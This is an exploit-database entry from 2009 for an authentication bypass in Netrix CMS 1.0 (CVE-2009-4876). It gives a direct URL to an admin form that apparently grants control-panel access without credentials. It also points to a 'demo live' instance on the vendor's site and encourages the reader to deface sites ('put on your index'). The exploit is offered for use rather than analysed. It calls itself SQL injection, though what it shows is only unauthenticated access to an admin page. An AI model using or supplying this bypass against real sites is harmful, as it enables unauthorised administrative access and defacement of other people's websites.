ad

Netrix CMS 1.0 Authentication Bypass Vulnerability



EDB-ID: 9203 CVE: 2009-4876 OSVDB-ID: 56008
Author: Mr.tro0oqy Published: 2009-07-20 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :Netrix CMS 1.0 (Auth Bypass) Remote SQL Injection Vulnerability

[+] Found by : Mr.tro0oqy  

[+] Script site : www.netrix.hu
   
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
Exploit : 
---------
http://www.site.com/path/admin/cikkform.php?cid=1
---------

u in control panel 


control panel :
-------------
http://www.site.com/path/admin
-------------



Demo live : 
-----------
http://cms.netrix.hu/admin/cikkform.php?cid=1
-----------

u can edit anything or put on your index ;)

# milw0rm.com [2009-07-20]